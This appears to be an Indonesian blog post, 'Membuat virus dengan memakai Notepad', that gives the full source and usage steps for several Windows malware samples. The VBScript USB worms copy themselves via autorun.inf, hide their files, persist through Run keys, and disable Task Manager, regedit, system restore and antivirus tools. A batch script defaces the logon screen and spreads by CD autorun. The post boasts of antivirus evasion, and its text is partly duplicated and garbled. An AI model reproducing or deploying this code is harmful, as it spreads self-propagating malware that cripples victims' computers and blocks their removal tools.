MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD
1. Buka Notepad
2. Copy kan kode dibawah ini:
2. Copy kan kode dibawah ini:
on error resume next
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(“WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs
membuat virus
ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!!
tapi yg penting gak ke-detect ama anti virus(setahu saya….. 
)
ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…
8)
note:
“HANYA BEKERJA PADA WINDOWS XP”
caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa…
) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir
….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
SALAM DAMAI UNTUK SEMUA TEMEN-TEMEN HACKER DI INDONESIA
buat virus
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
simpan dngan extensi bat
windows…..tapi cukup bikin kaget juga!!!
tapi yg penting gak ke-detect ama anti virus(setahu saya….. )ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…
8)note:
“HANYA BEKERJA PADA WINDOWS XP” caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa…
) script di bawah ini:@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir
….- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi
….- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
SALAM DAMAI UNTUK SEMUA TEMEN-TEMEN HACKER DI INDONESIA
buat virus
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
simpan dngan extensi bat
Tidak ada komentar:
Posting Komentar